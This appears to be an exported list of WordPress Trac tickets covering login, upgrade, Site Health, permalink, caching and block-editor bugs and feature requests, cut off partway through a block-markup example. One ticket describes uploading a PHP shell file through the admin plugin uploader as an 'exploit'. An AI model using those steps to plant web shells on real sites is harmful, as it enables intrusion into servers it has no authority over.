autofill password keeps showing after wp_attempt_focus clears password field Login and Registration 4.0 normal normal Future Release defect (bug) new dev-feedback 2014-10-17T17:30:50Z 2020-02-15T17:45:27Z "Chrome's autofill of remembered passwords causes an issue with wp_attempt_focus (defined in wp-login.php). The JavaScript function clears the password field, but Chrome still displays the field as filled out. Submitting the form results in the following error (obviously): * ERROR: The password field is empty. If people want to have Chrome autofill their password, I strongly suggest not to intervene. Not only are we going to annoy users by trying to hack around it (see ticket [ticket:24364]), but the hacks will also likely cause even more issues in a future Chrome release." Robbert S Future Releases 53298 Checking if wp-config-sample.php file exists before checking if wp-config.php exists Upgrade/Install 5.7.2 normal trivial Awaiting Review defect (bug) new dev-feedback 2021-05-29T20:34:43Z 2023-07-12T06:17:11Z "Currently in WordPress core, wp-admin/setup-config.php checks if wp-config-sample.php file exists before checking if wp-config.php exists. If the sample file exists, it then checks if the wp-config.php file exists, and if so, suggests deletion if necessary. For security, some WordPress users may delete the sample file, and restrict open_basedir for directory above that of the web root directory. Because of these two cases, the current order produces the follow error: `PHP message: PHP Warning: file_exists(): open_basedir restriction in effect. File(/var/www/example/wp-config-sample.php) is not within the allowed path(s): (/var/www/example/web:/var/www/example/private:/var/www/example/tmp:/tmp:...) in /var/www/example/web/wp-admin/setup-config.php on line 46` If the check for existence of sample file could be moved after checking if wp-config.php exists, we could avoid this error and avoid checking if sample file exists if wp-config.php does and not checking both if they both do. i.e. Moving the section commented `Support wp-config-sample.php one level up, for the develop repo.` to after the section commented `Check if wp-config.php exists above the root directory but is not part of another installation.` in `wp-admin/setup-config.php`" machineitsvcs Future Releases 54351 Checking for temp update directories may throw warnings Site Health 6.0 normal normal Future Release defect (bug) new dev-feedback 2021-10-31T15:47:41Z 2022-04-04T05:25:30Z "in [51815] the Site Health function `get_test_update_temp_backup_writable` was introduced, which is meant to check if upgrade directories exist, and are writable. When visiting the Site Health screen in a scenario where `WP_Filesystem` uses `ftpext` for manipulating the filesystem, this causes multiple warnings as the various calls to check for directories, and if they are writable, are causing PHP's `ftp_*` functions to fire, when there may not be a valid FTP connection available. (see [https://github.com/WordPress/wordpress-develop/blob/07ad6efdf7157d22424496d39d8c5635f28ecfbb/src/wp-admin/includes/class-wp-site-health.php#L1968-L1978 class-wp-site-health.php:1968-1678] I wonder if the best solution here might be to inject a connection call, which could then be used to determine if any other fields should be checked, or revert to a default value, I'm thinking along these lines: {{{#!php $filesystem_is_connected = $wp_filesystem->connect(); $wp_content = ( $filesystem_is_connected ? $wp_filesystem->wp_content_dir() : false ); $upgrade_dir_exists = ( $filesystem_is_connected ? $wp_filesystem->is_dir( ""$wp_content/upgrade"" ) : false ); $upgrade_dir_is_writable = ( $filesystem_is_connected ? $wp_filesystem->is_writable( ""$wp_content/upgrade"" ) : false ); $backup_dir_exists = ( $filesystem_is_connected ? $wp_filesystem->is_dir( ""$wp_content/upgrade/temp-backup"" ) : false ); $backup_dir_is_writable = ( $filesystem_is_connected ? $wp_filesystem->is_writable( ""$wp_content/upgrade/temp-backup"" ) : false ); $plugins_dir_exists = ( $filesystem_is_connected ? $wp_filesystem->is_dir( ""$wp_content/upgrade/temp-backup/plugins"" ) : false ); $plugins_dir_is_writable = ( $filesystem_is_connected ? $wp_filesystem->is_writable( ""$wp_content/upgrade/temp-backup/plugins"" ) : false ); $themes_dir_exists = ( $filesystem_is_connected ? $wp_filesystem->is_dir( ""$wp_content/upgrade/temp-backup/themes"" ) : false ); $themes_dir_is_writable = ( $filesystem_is_connected ? $wp_filesystem->is_writable( ""$wp_content/upgrade/temp-backup/themes"" ) : false ); }}} It should be noted that by providing `false` as the default value for all fields, we are essentially marking this check as valid, which may not be true at all, because if WordPress can't connect to the filesystem, it should instead be a failed test. The directories should probably be considered non-writable if they can't even be reached, this needs different logic further into the checks as well? This may still lead to a warning as well, if the `connect()` function is missing variables, in testing where no information is provided, it only complained about a missing hostname, we'll handle that in a separate ticket for the Filesystem API component." Clorith Future Releases 39362 Checkbox control for 'Automatically add new top-level pages to this menu' not wrapped in checkbox customize control Customize 4.7 normal normal Awaiting Review enhancement new dev-feedback 2016-12-21T11:48:34Z 2021-05-24T02:50:58Z "When you go to set the menu in the customizer you have the option to check the Menu Options for Adding the top-level pages automatically to the current menu. This option isn't wrapped in the {{{ <li class=""customize-control customize-control-checkbox""></li> }}} This isn't a bug, but a hindrance if you want to customize the look of the customizer and would like to have all the checkboxes look the same. One could say that all one needs to add is the style for {{{ .input[type=""checkbox""] }}} but this is not true if you have a custom control that has a checkbox input, and you want to style it differently. In that case you'd need to overwrite additionally. Plus the current style is styled via {{{.customize-control-checkbox input[type=""checkbox""]}}} as well as with just {{{input[type=""checkbox""]}}}." dingo_d Future Releases 43666 Check update post meta before add new post meta in WordPress Importer Import normal normal Awaiting Review enhancement new dev-feedback 2018-03-30T11:59:20Z 2018-09-04T11:01:12Z When we import any post/page content XML multiple time new post meta import multiple time so before import any post meta import we have to check if same post with meta key is exist or not if not exist then we have to add new post meta using add_post_meta function or update that post meta using update_post_meta function. mukesh27 Future Releases 56017 Check the required PHP extensions during WordPress installation and updates Upgrade/Install normal normal Future Release task (blessed) new dev-feedback 2022-06-20T15:59:16Z 2022-10-11T12:50:49Z "Background: #55603 Currently, marking a PHP extension as required in Site Health displays a warning on existing sites if the extension is unavailable, but it does not block the WP installation for new sites, nor the updates to the new version for older sites. To avoid fatal errors, WordPress core should check for the required PHP extensions both during installation and updates, similar to how we check for the required PHP and MySQL versions. As also noted by @jrf in comment:2:ticket:55603: > Might also be a good time to improve the code re-usability in that regards (have one master list of requirements and recommendations, which both the requirements checker on installation/load + the Site Health component draw from)." SergeyBiryukov Future Releases 40065 Check for invalid user before `lostpassword_post` in `retrieve_password()` Login and Registration 4.7.3 normal normal Awaiting Review enhancement new dev-feedback 2017-03-07T22:14:22Z 2018-05-04T01:18:16Z Some errors are added before `lostpassword_post` and one is added after. It'd be nice if all of the errors were present when the action is called. This patch fixes that. jfarthing84 Future Releases 56713 Check ACL permission before upgrading Upgrade/Install normal normal Awaiting Review defect (bug) new dev-feedback 2022-10-02T08:22:01Z 2022-10-17T00:37:51Z "I am using ACL to define permissions of files and folder of my wordpress installation, but when I upgrade my wordpress installation using web ui tool, I am getting the following error: {{{ Warning: chmod(): Operation not permitted in /home/my-website/wp-admin/includes/class-wp-filesystem-direct.php on line 173 }}} Then the upgrade is stuck in an invalid state and I have to upgrade it manually. Wordpress upgrade program should check all its abilities before trying to upgrade and it should handle the case of using ACL for permissions. All permissions are good, it's just using ACL instead of MOD. The is the third upgrade I am experiencing this issue." Cartman34 Future Releases 48879 Changing Site Admin Email Assumes Username and Who Took the Action (which may be incorrect) Users 5.3 normal minor Future Release enhancement new dev-feedback 2019-12-04T20:12:16Z 2024-03-15T16:47:52Z "(Note that this is on MultiSite and I don't know exactly how it functions on a single site install.) I think the email message that is sent when someone updates a Site Admin Email Address should be modified as to NOT be addressed: Dear CURRENT_USER_NAME, and shouldn't say that ""YOU"" have recently requested to update the email. If I want to change the site admin email for a site, the confirmation email goes to the new email address (say, a client), but the email says ""Dear MadtownLems,"". We have had a few cases now where these emails alarmed users and thought they were phishing attempts or had been hacked. This is very confusing for our users, as they have received an email addressed to someone else, and it tells them that they tried to do something that they may not have tried to do. Rather, I believe the text would be much cleaner if it said something like: ""Someone ('MadtownLems') has requested to update the email address for the site..."" " MadtownLems Future Releases 48563 Changing site admin email address is backwards Users normal normal Awaiting Review enhancement new dev-feedback 2019-11-11T16:31:28Z 2021-04-27T00:43:26Z "The current process for changing the admin email address in the General settings tab seems pretty sketchy to me. Currently: 1. Change the email address. 2. Confirmation email is sent to the NEW admin. 3. New admin confirms 4. Email sent to OLD admin to inform him or her it was done. It should be: 1. Change the email address. 2. Confirmation email sent to OLD admin to be sure it’s ok to change this very important information. 3. Old admin confirms it’s ok (or freaks out and starts changing passwords because he or she did not initiate this process). 4. Email is sent to NEW admin to accept the invite and to verify the address. 5. NEW admin confirms address and accepts new responsibility. 6. Email goes to old admin to let them know the process has been completed." maguijo Future Releases 42354 Changing Add New theme link in wp-admin/themes.php Themes 4.9 normal normal Future Release enhancement new dev-feedback 2017-10-27T10:36:41Z 2021-05-29T18:35:49Z "In 4.9, we can install theme with live previewing in customize. so it will better WordPress user land on /wp-admin/customize.php?autofocus[panel]=themes&autofocus[section]=wporg_themes to install new theme, when they click on 'Add New' button on wp-admin/themes.php Or when WordPress user click on wp-admin/themes.php under Appearance because WordPrss user can perform same actions in customize related to wp-admin/themes.php. Right now, there is two pages / parts in core to do same task. 1. under customize, 2. under wp-admin/themes.php" rinkuyadav999 Future Releases 48316 "Changeset 46482 breaks upload when using "".."" in upload_path." Filesystem API 5.2.4 normal normal defect (bug) reopened dev-feedback 2019-10-15T21:01:42Z 2024-02-07T13:39:06Z "Hi, We just found out that changeset [46482] in the latest WordPress 5.2.4 broke a huge number of our customer's sites (tens or thousands). We uses a separate subdomain as upload directory. This is done by changing the option ""upload_path"" to ""../../media.example.com/www/"" (and ""upload_url_path"" to ""http://media.example.com""). This change means that new directories (for example ""./2019/10/"") can't be created, which breaks the entire upload functionality. If this changeset fixed some critical vulnerability which can't be fixed another way or if we are the only ones utilizing this feature, so be it. Otherwise this change might have to be reverted and reimplemented some other way. " xpoon Future Releases 58781 Change wording of field description for tagline Administration normal normal Future Release enhancement new dev-feedback 2023-07-11T06:26:54Z 2024-01-19T06:33:34Z "This is a follow-up to #57675 I [https://core.trac.wordpress.org/ticket/57675#comment:28 raised my concerns there], but it was too late in the cycle. So here we go: These are my concerns about the solution we use now: 1) The example is misleading, the tagline should be meaningful, and just not like in the example Using a unique and descriptive tagline is important for search engine optimization (SEO) purposes, as it helps convey the website's purpose and relevance to both search engines and visitors. 2) The “ and ” could be misunderstood so people would enter quotation marks into the tagline. This can impact the visual presentation and readability of the tagline to visitors. To keep the iconic phrase ""Just another WordPress site"" while being informative at the same time we could formulate: In a few words, explain what this site is about. We're sure your site is so much more than ""Just another WordPress site""" Presskopp Future Releases 37831 Change the permalink structure without changing the url of older articles Permalinks normal normal Awaiting Review feature request new dev-feedback 2016-08-25T22:22:50Z 2019-04-19T15:19:48Z "A nice feature would be to change the permalink structure without changing the url of older articles. Many users complain of having 404 errors on old articles. This causes problem when there are dozens or hundreds of articles. Not everyone has the competences to manage the redirections " Djibs13 Future Releases 10483 Change post_name's length from 200 to 400 SergeyBiryukov Permalinks normal minor Future Release enhancement reviewing dev-feedback 2009-07-25T06:31:52Z 2023-12-29T16:39:52Z "Hello, guys! Thank you very much for providing such a great piece of software! I love WordPress very much! :) I use WordPress in Russian language and the URLs on my [http://www.ielnur.com blog] consist of Russian characters. There is a [http://www.ielnur.com/blog/2009/05/снова-бросить-курить-30-тидневное-испытание/ post] with not such a long URL in Russian, but since it gets encoded to special characters it becomes too long to get fit into `post_name` field of `post` table. I've found what code needs to be changed to increase the length. I make these changes every time a new version is released. I think it would be better to submit a patch here so that others people can benefit from it and I will not need to make those changes every release. I'm attaching the patch to this ticket and asking you to apply it to the code. Thank you very much again, guys! You do a great job! :) Cheers, Elnur" elnur Future Releases 55459 Change Login Label name Login and Registration normal normal Future Release enhancement new dev-feedback 2022-03-25T09:31:21Z 2024-02-12T14:57:37Z "I wanted to change the Login Labels of my Login Page and couldn't find anything to hook as it is only labeled with raw values. It would be a lot better if there was anything else than gettext function to change the value. Maybe a filter. " wparslan Future Releases 46618 Change login behaviour to only set the test cookie when a user attempts to login instead of just on visiting the login page Login and Registration normal normal Awaiting Review enhancement new dev-feedback 2019-03-23T09:02:24Z 2019-04-05T05:13:50Z "Hello, I'm branching this from #44175 to account for the idea presented by @SergeyBiryukov; > I wonder if we could change the behavior to match the text, so that the test cookie is only set upon trying to log in, as that probably makes more sense. I'd be more comfortable with doing that in a major release though. The change would be to move the logic for the test cookie to be triggered upon the login action rather than the login page visit. Cheers" garrett-eclipse Future Releases 55115 Change deprecated wpdb::escape() method Database normal normal Awaiting Review enhancement new close 2022-02-08T15:47:19Z 2022-02-12T15:46:30Z "the function wpdb::escape( string|array $data ) is depreciate as per documentation [https://developer.wordpress.org/reference/classes/wpdb/escape/], but it's still using depreciated function such as wpdb::_weak_escape and itself. I think we shouldn't use depreciated functions since charity begins at home." azouamauriac Future Releases 58237 Change default 'Blog pages show at most' to better divisible number Themes normal normal Awaiting Review feature request new dev-feedback 2023-05-02T20:00:26Z 2023-05-04T21:12:31Z "From the first versions of WordPress there is ""Blog pages show at most"" set to 10. It has worked fine in the old times, where the blog posts were linear. But today, they are shown in grid in default and most other templates. And very often it has a responsive behaviour - so it has 3 or 4 columns on desktop, 2 or 3 on tablets and 1 or 2 on mobile phones. The problem is, that 10 is not divisible by 3 or 4. So if you have more then default 10 posts, there is an ugly gap before the list and the numbering. Setting this default to 12 would make it work for 99,99 % cases and it is very simple change without backward compatibility issues (as it is a database value so it will not affect existing websites, only the new ones)." thomask Future Releases 45076 Category counter is not updated Taxonomy normal normal Awaiting Review defect (bug) new dev-feedback 2018-10-11T06:08:01Z 2018-12-09T21:13:46Z "When we create new category from admin panel category successfully added in right category panel but it's counter is not updated. Suppose i have create five category like !''Category 1!'', !''Category 1.1!'', !''Category 2!'', !''Category 2.1!'', !''Uncategorized!'' system show counter as 5 items but when i create new category called !''Category 3!'' it will added successfully in category list but total counter still show 5 items it should show 6 items but when i refresh that page it show counter as 6 items. Check video https://youtu.be/rBmziC5_0XQ" mukesh27 Future Releases 43281 "Capitalize ""Set featured image"" media button on Media Modal" Media normal normal Future Release enhancement new dev-feedback 2018-02-10T18:49:38Z 2021-04-27T17:00:40Z "All the button on WordPress are in capitalize form except this ""Set featured image"" button so there should be consistency on all button." monikarao Future Releases 18385 "Canonical redirections not suited for Queries with multiple query vars and ""pretty permalinks"" in general" Canonical 3.2 normal normal enhancement new dev-feedback 2011-08-12T09:05:03Z 2019-06-04T19:22:40Z "When the Canonical code was originally written, it served it's purpose quite well. However, over the years the number of Query vars which can be used to access content via has increased, and so have the number of archive views. This has lead to increased complexity in the Taxonomy canonical code which has needlessly caused bugs. What I'm proposing, is that it might be time to lay to rest the current `if.. elseif.. elseif..` style checks, It's not possible for 1 if branch to handle every single access point without duplicating another branch. As a result, I've put a half-finished together alternate version of Canonical, It's based on tallying up which query vars have been used/accounted for and removing any duplicates.. It's certainly not the best, but it's fairing better with the unit tests so far. {{{ Unit Testing: http://unit-tests.trac.wordpress.org/browser/wp-testcase/test_includes_canonical.php Before: FF.......FFFF..FFF.....F......FFFFFF.F....F.....FF....FF... After: FF...........FFF..................FF..................F.... }}} It's a work in progress, but it's worth considering IMO. Attaching a diff, and the full file (since the diff is going to be rather unreadable in some sections)" dd32 Future Releases 19691 Cannot modify admin messages for /wp-admin/edit.php Administration 3.3 normal normal enhancement new dev-feedback 2011-12-30T02:10:01Z 2019-06-04T19:22:50Z "The admin console messages output on line `264` of WordPress 3.3's file `/wp-admin/edit.php` are not filterable. This causes problems when added row actions need to HTTP GET from to WordPress to modify a post and then display an appropriate message complete with a revert link ''(like the ""Trash"" link does.)'' An example use-case could be for a custom post type used for both quotes and invoices where a row action might be ''""Convert Quote to Invoice""'' where you'd want a message and link displayed at the top of the admin after similar to this: - ''Quote #{$post_id} converted to Invoice. __Revert__'' Currently the only way to accomplish this is to pick hooks before and after the messages are output and use PHP's output buffering; clearly not a ''""best practice""'' approach. In order to address this I'm proposing an '''`'admin_messages'`''' filter hook to run just before the messages are output: {{{ $messages = apply_filters( 'admin_messages', $messages ); }}} However, since messages are output in numerous locations in the WordPress admin it seemed best to add the hook in every location where messages are output, which is what my patch does. Thus a hook can look at `$pagenow` or `get_current_screen()` to decide it is needs to do anything. Also while searching for places in the admin code that echo messages I found `$messages` are sometimes an array of HTML where the entire array is echoed and other times the $messages are an array with an index passed via `$_GET` and only one message will be displayed. For those cases I created another hook '''`'admin_message'`''' ''(note that this hook name is singular)'': {{{ $message = apply_filters( 'admin_message', $message, $messages, $_GET['message'] ); }}} I really only found a specific need for `/wp-admin/edit.php` today, but it seemed that it would be better for consistency if all messages were made hook filterable. That's why I created a larger patch when all my use-case needs is one new line. Looking forward to your feedback. " mikeschinkel Future Releases 57979 Can't upload images to WordPress Comments Comments 6.0.3 normal normal Future Release defect (bug) new changes-requested 2023-03-24T13:39:57Z 2023-10-16T15:35:22Z As the admin, I am unable to upload images from my image library to a WordPress comment posted by a user. Please Note: I can upload images to my own comments, but not a user-generated comment. On the admin page, I edit a user comment, click IMG button, add the image URL, and the correct code is added to the comment. When I click UPDATE, the image code disappears. Please note that all existing images in Comments display properly. This is a new problem. Theme is Genesis Magazine Pro. I tried: deactivating all plugins, multiple browsers, multiple operating systems (PC and Mac), and multiple computers. Also contacted my web host, WP-Engine, who has had other reports of this problem and believes it is a WordPress issue. Site is buildingadvisor.com. Thank you! sbb Future Releases 36595 can't set post_modified in wp_insert_post, becomes post_date Posts, Post Types 1.0 normal normal defect (bug) new dev-feedback 2016-04-19T15:34:29Z 2020-04-01T19:46:50Z "When manually instering a post, post_modified isn't working, it becomes the post_date {{{#!php <?php $wp_test = array( 'post_title' => 'test', 'post_content' => 'test', 'post_status' => 'publish', 'post_type' => 'test', 'post_author' => 1, 'post_date' => '2015-01-22 22:00:12', 'post_modified' => '2016-04-18 12:12:12', 'comment_status' => 'closed' ); wp_insert_post( $wp_test ); }}} outcome: post_modified = '2015-01-22 22:00:12'" gijsgg Future Releases 23779 Can't insert large image if it's smaller than media setting but larger than theme setting Media 3.0 normal normal defect (bug) new dev-feedback 2013-03-15T00:47:08Z 2019-06-04T20:05:06Z "If you upload an image that is larger than $content_width but not larger than the ""large"" setting in settings->media, the option to insert a ""large"" image into the post isn't available even though the image is large enough. It looks like it must use $content_width as the actual width of the large image that's inserted, and the large_size_w setting to decide whether to show that option or not." aaroncampbell Future Releases 42248 Can't create category slug with same name for different parents Permalinks 4.9 normal normal Awaiting Review defect (bug) new dev-feedback 2017-10-17T13:11:38Z 2017-10-25T12:52:46Z "Issue with same category slug creation even though both have different parent category. For example I have structure like this wanted to build up. Cars - Category Toyota & Maruti - Subcategory of Cars Parts - Subcategory of Toyota & Maruti /cars/toyota/parts /cars/maruti/parts Wordpress isn't allow it. See attached screenshot." ashokrd2013 Future Releases 40552 Calling wp_parse_args() early, with $args as empty string, may cause fatal error Formatting normal normal Awaiting Review defect (bug) new dev-feedback 2017-04-24T15:41:28Z 2021-06-19T23:00:51Z "When running the unit test suite while working on #31245, I ran into an edge-case fatal error: {{{ Fatal error: Uncaught Error: Call to undefined function wp_parse_str() in /srv/www/wordpress-develop/public_html/src/wp-includes/functions.php on line 3487 Error: Call to undefined function wp_parse_str() in /srv/www/wordpress-develop/public_html/src/wp-includes/functions.php on line 3487 }}} Anytime between `functions.php` being loaded and `formatting.php` being loaded, calling `wp_parse_args()` with an empty string as the first parameter will trigger it, and I was doing this in the `wp_load_alloptions()` stack with my test code. It happens because `wp_parse_args()` calls `wp_parse_str()` when `$args` is an empty string, and because `formatting.php` is loaded well after `functions.php`, the above fatal happens. ---- It's not a bug in core today, but it could be a problem later. In my research, one place of relatively high risk is `register_setting()`. You'd need to pass an empty string as the third parameter, and it would need to be early in the stack, but it calls `wp_parse_args()` and is in `functions.php`. ---- One potential solution is to move `wp_parse_str()` out of `formatting.php` and into `functions.php`, alongside it's other `wp_parse_` siblings. Another would be to load `formatting.php` sooner." johnjamesjacoby Future Releases 37762 cache_results parameter doesn't prevent queried posts from being added to cache boonebgorges Query 4.6 normal normal Future Release defect (bug) assigned dev-feedback 2016-08-22T09:39:42Z 2022-06-15T13:23:14Z "Even when `cache_results` is set to `false`, the queried posts in `WP_Query` are still mapped to `get_post()` which will always add post instance to cache. For more info: http://wordpress.stackexchange.com/questions/236653/how-to-prevent-queried-posts-from-being-added-to-cache/236659. " Dang Vu Future Releases 54861 cache_javascript_headers() is not call by core General 5.9 normal normal Awaiting Review enhancement new dev-feedback 2022-01-20T00:48:20Z 2022-01-20T01:14:08Z I can't where this function is used in core should we move it to depicted if its not being used? pbearne Future Releases 59596 Cache file sizes of core block style files. Editor 6.3 normal normal Future Release enhancement new dev-feedback 2023-10-11T12:15:44Z 2023-10-11T15:38:58Z Introduced in #58528 / [56044], there is now cache for file lookups for core block styles. This was to save file lookups and improve server response time. However, when styles are processed in `wp_maybe_inline_styles` a file lookup is done using `wp_filesize` to get the file size and if the file exists. These lookup can be expensive. As there is already an existing transient cache, reuse that to also cache the file size of the files. spacedmonkey Next Release 60614 Button block's Outline style does not have border in non-framed editor Editor trunk normal normal 6.5 defect (bug) new dev-feedback 2024-02-23T03:44:34Z 2024-03-19T07:53:58Z "Hello, I have reviewed the button block and found that the button ""outline"" does not appear on the editor side. Here, I have attached its screenshots: **Environment info -----------------** Device: Macbook M1 OS: 14.3.1 (23D60) Browser: Google Chrome Version 121.0.6167.184 (Official Build) (arm64) WordPress version: 6.4.3 running, Gutenberg 17.7.0, Theme active: Twenty Twenty-Two, Thanks," viralsampat Future Releases 46292 Bump `set_time_limit()` at the start of the update process, instead of mid-way. Upgrade/Install normal normal Awaiting Review defect (bug) new dev-feedback 2019-02-21T02:23:37Z 2022-12-15T21:44:11Z "Currently WordPress calls `set_time_limit( 300 )` before it installs an update, however it calls this at the point between unzipping the files, and copying them into place. For plugins/themes/translations/etc it's [https://core.trac.wordpress.org/browser/trunk/src/wp-admin/includes/class-wp-upgrader.php?marks=466#L447 this call] for core it's [https://core.trac.wordpress.org/browser/trunk/src/wp-admin/includes/update-core.php?marks=882#L869 this one]. This, combined with the much higher core package sizes (More than doubled since 3.7) results in some people hitting the default php execution cap of 30 seconds during the download phase when testing locally (For example, 11MB @ 2.5mbit/s = 35 seconds). To make it more 'annoying', The `core_upgrader` Lock is put in place before the package is downloaded, so if they run into the timeout during downloading, the lock will still be in place in `wp_options` for 15 minutes. `set_time_limit` should be set at the start of the process, likely at the point of the locks being created, before downloads have begun." dd32 Future Releases 51784 Build/Test Tools: Consider always running npm install with --no-optional Build/Test Tools normal normal Future Release enhancement new close 2020-11-16T10:38:14Z 2024-01-03T17:12:41Z "Currently there are 248 optional third (and forth, fifth) party dependencies in package-lock.json that don't seem needed. Running `npm install --no-optional` seems to still install many of them (presumably as they are needed by other dependencies) but reduces the overall size of node_modules by about 40MB and speeds things up a bit. " azaozz Future Releases 55466 Build Tools: create Docker test environment that use non-direct filesystems Build/Test Tools normal normal Future Release enhancement new dev-feedback 2022-03-26T04:03:21Z 2023-02-02T04:53:27Z "Recently when writing a PR for #51170, @costdev and I, mostly Colin as I let him do this, had a somewhat difficult time setting up a testing environment that used FTPext or FTPsockets. It would be awesome if this could be built into a Docker image for testing with WordPress-develop. If this can be done it might be worthwhile to setup environments for the other file system methods too." afragen Future Releases 55437 Bugfix: Display correct theme in site editor SergeyBiryukov Themes 5.9 normal normal Future Release defect (bug) reopened dev-feedback 2022-03-22T03:31:29Z 2024-02-20T09:50:02Z "Scenario: Child themes inherit template parts from the parent theme but on the site editor page, the ""Added by"" column defaults to displaying the child theme even though the template parts are inherited from the parent. This creates confusion as to where the actual templates are located. Patch: https://github.com/ptahdunbar/WordPress/commit/25bbf034af03c9a4ea33a79d01f4d9c079750344 Probably should look into _build_block_template_result_from_post() as well. Possibly related to [52062]" ptahdunbar Future Releases 27804 bug when updating after domain change settings Administration 3.8.2 normal normal defect (bug) new dev-feedback 2014-04-14T22:07:08Z 2019-06-04T19:25:28Z "I have found the following bug that affects for sure wordpress 3.8.2 and the latest 3.8.3. I have noticed this bug when I changed my domain settings: WordPress Address (URL) and Site Address (URL) from a domain say www.mydomain.org to www.mydomain.com. In the admin panel, when I get notified of new updates to be installed, installation of wordprewss, plugins and themes seems successful but is not performed. After a bit of banging my head on the problem, for curiosity decided to switch back to www.mydomain.org and all updates were installed! It's a bit annoying doing this procedure for every new updates. Can anybody reproduce this?" robomotic Future Releases 49725 Bug in plugin upload Upload normal normal Awaiting Review defect (bug) new dev-feedback 2020-03-29T07:47:29Z 2020-03-30T07:54:45Z "bug in wordpress version 5.3.2 how to exploit: 1. download wordpress and run into localhost. 2. trying to upload plugin than they are showing here only upload .zip file. 3. but we are trying to upload .php shell file. 4. now see file is upload successfully in database. " offensive Future Releases 45764 blog page and homepage the same list pages and not posts Posts, Post Types 5.0.2 normal minor Awaiting Review defect (bug) reopened dev-feedback 2018-12-25T11:47:36Z 2019-12-12T19:24:07Z "Hi I don't know when this was changed but if you set the same page as blog page aswell as your homepage the website starts listing pages on that blog and home page and not posts. Why was this changed and when? Thanks for any advice. " BackuPs Future Releases 60653 Block-based Widgets Editor - Site Logo Block is not listed. Widgets 6.4 normal minor Awaiting Review feature request assigned dev-feedback 2024-02-28T15:47:51Z 2024-03-12T19:18:51Z "It would be interesting to activate the Site Logo Block to appear in the Block-based Widgets Editor. [[Image(https://i.ibb.co/BLRLFp5/Captura-de-tela-2024-02-28-124402.png)]]" williansantana Future Releases 47420 Block markup containing HTML in block attributes is corrupted when using wp_insert_post General normal normal Awaiting Review defect (bug) new dev-feedback 2019-05-28T17:12:15Z 2023-08-30T18:26:32Z "**Issue** Some blocks allow HTML in their block attributes, which display correctly in the editor and the front end. An example is the Pricing block in Atomic Blocks: https://wordpress.org/plugins/atomic-blocks/ If block content copied from the block editor as raw code contains HTML in its block attributes, inserting that content with wp_insert_post() results in corrupt blocks. This appears to be due to the way block attributes like this: {{{ {""price"":""<strong>49</strong>"",""currency"":""$"",""term"":""/mo""} }}} Are encoded like this when saved: {{{ {""price"":""\u003cstrong\u003e49\u003c/strong\u003e"",""currency"":""$"",""term"":""/mo""} }}} **To reproduce** 1. Install Atomic Blocks and activate Twenty Nineteen. 2. Add this code to your theme's functions.php, refresh any page to trigger the code, then remove the code: {{{#!php <?php $post_content = <<<CONTENT <!-- wp:atomic-blocks/ab-pricing --> <div class=""wp-block-atomic-blocks-ab-pricing ab-pricing-columns-2""><div class=""ab-pricing-table-wrap ab-block-pricing-table-gap-2""><!-- wp:atomic-blocks/ab-pricing-table --> <div class=""wp-block-atomic-blocks-ab-pricing-table ab-block-pricing-table-center ab-block-pricing-table"" itemscope itemtype=""http://schema.org/Product""><div class=""ab-block-pricing-table-inside"" style=""border-width:2px;border-style:solid""><!-- wp:atomic-blocks/ab-pricing-table-title {""title"":""\u003cstrong\u003ePrice Title\u003c/strong\u003e"",""fontSize"":""medium"",""paddingTop"":30} --> <div itemprop=""name"" style=""padding-top:30px;padding-right:20px;padding-bottom:10px;padding-left:20px"" class=""wp-block-atomic-blocks-ab-pricing-table-title ab-pricing-table-title has-medium-font-size""><strong>Price Title</strong></div> <!-- /wp:atomic-blocks/ab-pricing-table-title --> <!-- wp:atomic-blocks/ab-pricing-table-subtitle {""subtitle"":""Price Subtitle Description"",""customFontSize"":20} --> <div class=""wp-block-atomic-blocks-ab-pricing-table-subtitle ab-pricing-table-subtitle"" style=""font-size:20px;padding-top:10px;padding-right:20px;padding-bottom:10px;padding-left:20px"">Price Subtitle Description</div> <!-- /wp:atomic-blocks/ab-pricing-table-subtitle --> <!-- wp:atomic-blocks/ab-pricing-table-price {""price"":""\u003cstrong\u003e49\u003c/strong\u003e"",""currency"":""$"",""term"":""/mo""} --> <div class=""wp-block-atomic-blocks-ab-pricing-table-price ab-pricing-table-price-wrap ab-pricing-has-currency"" style=""padding-top:10px;padding-right:20px;padding-bottom:10px;padding-left:20px""><div itemprop=""offers"" itemscope itemtype=""http://schema.org/Offer""><span itemprop=""priceCurrency"" class=""ab-pricing-table-currency"" style=""font-size:24px"">$</span><div itemprop=""price"" class=""ab-pricing-table-price"" style=""font-size:60px""><strong>49</strong></div><span class=""ab-pricing-table-term"" style=""font-size:24px"">/mo</span></div></div> <!-- /wp:atomic-blocks/ab-pricing-table-price --> <!-- wp:atomic-blocks/ab-pricing-table-features {""customFontSize"":20,""paddingTop"":15,""paddingBottom"":15} --> <ul itemprop=""description"" class=""wp-block-atomic-blocks-ab-pricing-table-features ab-pricing-table-features ab-list-border-none ab-list-border-width-1"" style=""font-size:20px;padding-top:15px;padding-right:20px;padding-bottom:15px;padding-left:20px""><li>Product Feature One</li><li>Product Feature Two</li><li>Product Feature Three</li></ul> <!-- /wp:atomic-blocks/ab-pricing-table-features --> <!-- wp:atomic-blocks/ab-pricing-table-button {""buttonText"":""Buy Now"",""buttonBackgroundColor"":""#272c30"",""paddingTop"":15,""paddingBottom"":35} --> <div class=""wp-block-atomic-blocks-ab-pricing-table-button ab-pricing-table-button"" style=""padding-top:15px;padding-right:20px;padding-bottom:35px;padding-left:20px""><div class=""ab-block-button""><a class=""ab-button ab-button-shape-rounded ab-button-size-medium"" style=""color:#ffffff;background-color:#272c30"">Buy Now</a></div></div> <!-- /wp:atomic-blocks/ab-pricing-table-button --></div></div> <!-- /wp:atomic-blocks/ab-pricing-table --> <!-- wp:atomic-blocks/ab-pricing-table --> <div class=""wp-block-atomic-blocks-ab-pricing-table ab-block-pricing-table-center ab-block-pricing-table"" itemscope itemtype=""http://schema.org/Product""><div class=""ab-block-pricing-table-inside"" style=""border-width:2px;border-style:solid""><!-- wp:atomic-blocks/ab-pricing-table-title {""title"":""\u003cstrong\u003ePrice Title\u003c/strong\u003e"",""fontSize"":""medium"",""paddingTop"":30} --> <div itemprop=""name"" style=""padding-top:30px;padding-right:20px;padding-bottom:10px;padding-left:20px"" class=""wp-block-atomic-blocks-ab-pricing-table-title ab-pricing-table-title has-medium-font-size""><strong>Price Title</strong></div> <!-- /wp:atomic-blocks/ab-pricing-table-title --> <!-- wp:atomic-blocks/ab-pricing-table-subtitle {""subtitle"":""Price Subtitle Description"",""customFontSize"":20} --> <div class=""wp-block-atomic-blocks-ab-pricing-table-subtitle ab-pricing-table-subtitle"" 